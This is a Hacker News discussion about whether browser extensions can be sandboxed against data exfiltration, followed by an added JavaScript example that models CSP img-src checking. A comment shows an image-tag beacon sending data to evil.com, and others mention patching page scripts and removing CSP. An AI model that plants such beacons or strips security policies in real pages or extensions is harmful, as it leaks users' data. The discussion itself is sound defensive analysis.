Hacker News

Do extensions require any permissions to make requests? It seems like a strict sandbox that prevents data from flowing out of a page via an extension would help, if the extension is something like a JSON renderer.


Most extensions need the ability to modify webpages. With that ability, they can easily exfiltrate data by, for example, adding an <img src=evil.com/?data=82374682376>.

Trying to sandbox an extension that can modify arbitrary webpages in arbitrary ways is near futile.


> Trying to sandbox an extension that can modify arbitrary webpages in arbitrary ways is near futile.

Just don't let them create script elements, or add any URLs that don't come from within the extension bundle itself. Browsers already have to do a ton of bookkeeping to track the origins of requests anyway. Doesn't seem hard, you just have to be thorough.


Restricting the extension to pre-baked URLs means it takes several page loads to exfiltrate something, but doesn't stop it.


There would be ways to trick the original page into adding stuff for you.

For example, you could patch some of the original script of the page and wait for it to be run.


Couldn't CSP be used to limit which paths were valid URLs?

There could also be hierarchies of extension permissions, because they don't all need to be able to do everything.


Extensions can also remove/add CSPs I think, either through modifying the header or modifying the DOM.


Yes, but you could strictly limit which extensions had that permission, make it a site specific permission, etc. Auto disabling an extension that changes to require that permission would be a start.
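
Added example, not written by any commenter in this thread: a simplified model of how a CSP `img-src` source list would classify the image-beacon URL discussed above. The function names, the policy string and the hosts (`app.example`, `cdn.example`, `collector.example`) are constructed for illustration, and the matching is a deliberate simplification of what browsers implement.

```javascript
// Added example: simplified CSP source-list matching for image loads.
// Handles 'self', *, scheme sources (https:) and host sources with optional
// scheme, leading "*." wildcard and path. Sources with ports, nonces or
// hashes are treated as non-matching (fail closed). Real browsers do more.

function parseCsp(header) {
  const policy = new Map();
  for (const part of header.split(';')) {
    const [name, ...sources] = part.trim().split(/\s+/).filter(Boolean);
    // The first occurrence of a directive wins; later duplicates are ignored.
    if (name && !policy.has(name.toLowerCase())) policy.set(name.toLowerCase(), sources);
  }
  return policy;
}

function sourceMatches(source, url, pageOrigin) {
  const src = source.toLowerCase();
  if (src === "'self'") return url.origin === pageOrigin;
  if (src.startsWith("'")) return false; // 'none', 'unsafe-inline', nonces, hashes
  const isWeb = url.protocol === 'http:' || url.protocol === 'https:';
  if (src === '*') return isWeb;
  if (/^[a-z][a-z0-9+.-]*:$/.test(src)) return url.protocol === src;
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?([^/:]+)(\/.*)?$/i.exec(source);
  if (!m) return false;
  const [, scheme, host, path] = m;
  // Simplification: a schemeless host source is allowed to match http or https.
  if (scheme ? url.protocol !== scheme.toLowerCase() + ':' : !isWeb) return false;
  const h = host.toLowerCase();
  const hostOk = h.startsWith('*.') ? url.hostname.endsWith(h.slice(1)) : url.hostname === h;
  if (!hostOk) return false;
  if (!path || path === '/') return true;
  // A path ending in "/" is a prefix match; otherwise it must match exactly.
  return path.endsWith('/') ? url.pathname.startsWith(path) : url.pathname === path;
}

function imageAllowed(cspHeader, pageUrl, imgSrc) {
  const policy = parseCsp(cspHeader);
  const sources = policy.get('img-src') ?? policy.get('default-src');
  if (sources === undefined) return true; // no governing directive
  const url = new URL(imgSrc, pageUrl); // resolve relative URLs like the browser
  return sources.some((s) => sourceMatches(s, url, new URL(pageUrl).origin));
}

// Constructed sample policy and page (hypothetical hosts).
const CSP = "default-src 'self'; img-src 'self' https://cdn.example/img/";
const PAGE = 'https://app.example/inbox';
console.log(imageAllowed(CSP, PAGE, 'https://collector.example/?data=82374682376'));
console.log(imageAllowed(CSP, PAGE, '/static/logo.png'));
```

The empty-policy case returns `true`, which is the situation the replies above describe when the policy has been removed before the page is evaluated.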



